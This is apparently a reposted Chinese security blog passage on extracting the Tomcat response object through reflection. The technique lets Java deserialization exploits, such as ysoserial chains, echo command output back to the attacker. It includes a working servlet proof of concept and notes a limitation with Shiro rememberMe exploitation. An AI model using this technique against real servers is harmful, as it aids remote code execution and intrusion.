坑点记录#开始想直接获取内部类发现思路不通,后来采用getDeclaredClasses方法获取某类中所有内部的内部类遍历,判断类名传递定位到该类 。获取global遍历的时候出现了巨坑,直接反射去获取 。但是未意识到创建是一个class对象,反射使用get方法必须传递实例 。获取到Request需要调用request.getNote(1);转换为org.apache.catalina.connector.Request的对象 。fanal修饰变量,需做修改,直接获取报错 。通过调用 org.apache.coyote.Request#getNote(ADAPTER_NOTES) 和 org.apache.coyote.Response#getNote(ADAPTER_NOTES) 来获取 org.apache.catalina.connector.Request 和 org.apache.catalina.connector.Response 对象文章链接
0x02 Tomcat半通用回显#基于Tomcat中一种半通用回显方法该篇文来调试一下 。
根据前文思路顺着堆栈一路向下查看Request和Response存储位置,只要获取到一个实例即可 。
顺着思路,在org.apache.catalina.core.ApplicationFilterChain位置发现符合条件的变量 。
下面寻找赋值位置,发现在这个位置对request,response进行实例的存储 。但是默认为False
思路如下:
1、反射修改ApplicationDispatcher.WRAP_SAME_OBJECT,让代码逻辑走到if条件里面
2、初始化lastServicedRequest和lastServicedResponse两个变量,默认为null
3、从lastServicedResponse中获取当前请求response,并且回显内容 。
自己尝试构造了一下
package com;import javax.servlet.ServletException;import javax.servlet.ServletRequest;import javax.servlet.ServletResponse;import javax.servlet.annotation.WebServlet;import javax.servlet.http.HttpServlet;import javax.servlet.http.HttpServletRequest;import javax.servlet.http.HttpServletResponse;import java.io.IOException;import java.lang.reflect.Field;import java.lang.reflect.Modifier;@WebServlet("/testServlet")public class testServlet extends HttpServlet {protected void doPost(HttpServletRequest request, HttpServletResponse response) {try {Field wrap_same_object = Class.forName("org.apache.catalina.core.ApplicationDispatcher").getDeclaredField("WRAP_SAME_OBJECT");Field lastServicedRequest = Class.forName("org.apache.catalina.core.ApplicationFilterChain").getDeclaredField("lastServicedRequest");Field lastServicedResponse = Class.forName("org.apache.catalina.core.ApplicationFilterChain").getDeclaredField("lastServicedResponse");lastServicedRequest.setAccessible(true);lastServicedResponse.setAccessible(true);wrap_same_object.setAccessible(true);//修改finalField modifiersField = Field.class.getDeclaredField("modifiers");modifiersField.setAccessible(true);modifiersField.setInt(wrap_same_object, wrap_same_object.getModifiers() & ~Modifier.FINAL);modifiersField.setInt(lastServicedRequest, lastServicedRequest.getModifiers() & ~Modifier.FINAL);modifiersField.setInt(lastServicedResponse, lastServicedResponse.getModifiers() & ~Modifier.FINAL);boolean wrap_same_object1 = wrap_same_object.getBoolean(null);ThreadLocal<ServletRequest> requestThreadLocal = (ThreadLocal<ServletRequest>)lastServicedRequest.get(null);ThreadLocal<ServletResponse> responseThreadLocal = (ThreadLocal<ServletResponse>)lastServicedResponse.get(null);wrap_same_object.setBoolean(null,true);lastServicedRequest.set(null,new ThreadLocal<>());lastServicedResponse.set(null,new ThreadLocal<>());ServletResponse servletResponse = responseThreadLocal.get();servletResponse.getWriter().write("111");} catch (Exception e) {e.printStackTrace();}}protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {this.doPost(request, response);}}同理,可集成到yso中,反序列化命令执行结果借助该servletResponse 。
局限#在shiro反序列化漏洞的利用中并不能成功,发现request,response的设置是在漏洞触发点之后,所以在触发漏洞执行任意java代码时获取不到我们想要的response 。其原因是因为rememberMe功能的实现是使用了自己实现的filter 。
以上关于本文的内容,仅作参考!温馨提示:如遇健康、疾病相关的问题,请您及时就医或请专业人士给予相关指导!
「四川龙网」www.sichuanlong.com小编还为您精选了以下内容,希望对您有所帮助:- linux系统安装步骤 yum安装命令
- 电脑怎么创建图片密码? 图片密码怎么设置
- 360发现全球汽车操作系统多个高危漏洞:获宝马和系统商双重致谢
- 安卓手机装win10系统操作方法 win10系统版本哪个好
- 自动喷水灭火系统由哪些部分组成
- 电脑开不开机怎么重装系统教程 win7无法关机怎么办
- word表格自动换页的技巧 word不分页怎么设置
- 2021国内最好用免费建站系统 免费个人网站空间申请
- windows7系统黑屏解决方法 win7激活工具哪个好用
- h5平台搭建步骤 h5建站系统源码